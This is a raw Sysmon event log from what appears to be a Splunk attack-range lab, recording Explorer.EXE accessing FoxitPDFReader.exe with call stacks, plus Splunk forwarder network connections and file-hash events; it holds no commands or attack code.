12:18:15.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:15.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:15.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:15.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000015428Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:17.028{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBEB297E37F8B8020366D68D70F7DDC1,SHA256=795F1F3639FED2AD26F1D9B20EAA8CDC4E1D08BCD79F209CD89E26CA53662538,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.971{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.964{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc75f(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.964{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc6ae(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.964{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64) 10341000x800000000000000040335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.964{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64) 10341000x800000000000000040334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.838{FE4C2B44-E326-63C7-F905-00000000AF02}32604388C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEAEAC2)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f5d4|C:\Windows\System32\wow64win.dll+6410|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64) 10341000x800000000000000040333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.838{FE4C2B44-E326-63C7-F905-00000000AF02}32604388C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEAEAC2)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f5d4|C:\Windows\System32\wow64win.dll+6410|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64) 10341000x800000000000000040332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.838{FE4C2B44-E326-63C7-F905-00000000AF02}32604388C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEAEAC2)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f5d4|C:\Windows\System32\wow64win.dll+6410|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64) 10341000x800000000000000040331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.838{FE4C2B44-E326-63C7-F905-00000000AF02}32604388C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEAEAC2)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f5d4|C:\Windows\System32\wow64win.dll+6410|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64) 10341000x800000000000000040330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.838{FE4C2B44-E326-63C7-F905-00000000AF02}32604388C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEAEAC2)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f5d4|C:\Windows\System32\wow64win.dll+6410|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64) 10341000x800000000000000040329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.838{FE4C2B44-E326-63C7-F905-00000000AF02}32604388C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEAEAC2)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f5d4|C:\Windows\System32\wow64win.dll+6410|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64) 10341000x800000000000000040328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.838{FE4C2B44-E326-63C7-F905-00000000AF02}32604388C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEAEAC2)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f5d4|C:\Windows\System32\wow64win.dll+6410|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64) 10341000x800000000000000040327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.838{FE4C2B44-E326-63C7-F905-00000000AF02}32604388C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEAEAC2)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f5d4|C:\Windows\System32\wow64win.dll+6410|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64) 10341000x800000000000000040326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.838{FE4C2B44-E326-63C7-F905-00000000AF02}32604388C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEAEAC2)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f5d4|C:\Windows\System32\wow64win.dll+6410|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64) 10341000x800000000000000040325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.838{FE4C2B44-E326-63C7-F905-00000000AF02}32604388C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEAEAC2)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f5d4|C:\Windows\System32\wow64win.dll+6410|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64) 354300x800000000000000015430Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:16.017{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50052-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015429Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:18.114{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7218E07E9C04295BAD9BD0DB5B7D356E,SHA256=8298AB4D0202EC35D62C0D1CECE825EDC6AA2087516288A6FE45821E29A2AE35,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:16.559{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56244-false10.0.1.12-8000- 10341000x800000000000000040396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.572{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e